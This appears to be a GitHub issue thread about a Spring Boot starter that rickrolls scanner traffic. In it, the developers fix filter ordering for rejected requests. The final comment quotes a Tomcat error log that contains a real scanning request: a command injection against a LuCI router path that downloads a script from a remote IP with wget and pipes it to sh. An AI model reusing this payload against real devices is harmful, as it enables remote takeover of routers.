rickroll-security-spring-boot-starter icon indicating copy to clipboard operation
rickroll-security-spring-boot-starter copied to clipboard

Published 20 hours ago verified publisher icon TomCools

Can't rickroll when RequestRejectedException is thrown

Open tschuehly opened this issue 1 year ago • 4 comments

My wordpress guys can't formulate proper URLs: image

The request is rejected before the filter and the rickroll is not applied.

I've tried adding an ExceptionAdvice but Spring routes to the /error endpoint before the Exception is caught

    @ExceptionHandler(RequestRejectedException::class)
    @ResponseBody
    fun handleRequestRejected(e: RequestRejectedException, response: HttpServletResponse) {
        response.sendRedirect("https://www.youtube.com/watch?v=dQw4w9WgXcQ")
    }

tschuehly avatar Jun 14 '24 15:06 tschuehly

Thanks for the report! Will look into this.

TomCools avatar Jun 14 '24 17:06 TomCools

@tschuehly found the issue, simple missing @Order annotation on the Filter. I do have some issues with my release setup, so it'll be for tomorrow morning.

TomCools avatar Jun 14 '24 19:06 TomCools

@tschuehly: This has been included in a new release: https://github.com/TomCools/rickroll-security-spring-boot-starter/releases/tag/v3.2.1.

I'll close this ticket once you've confirmed it works for you as well ;)

TomCools avatar Jun 15 '24 07:06 TomCools

Hey @TomCools the fix works!

It doesn't apply if tomcat catches the request because of an invalid character. This one clogs my logs aswell 😔

java.lang.IllegalArgumentException: Invalid character found in the request target [/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) ]. 
The valid characters are defined in RFC 7230 and RFC 3986
	at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:482) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:264) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:896) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1744) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at java.base/java.lang.Thread.run(Unknown Source) ~[na:na]

tschuehly avatar Jun 30 '24 13:06 tschuehly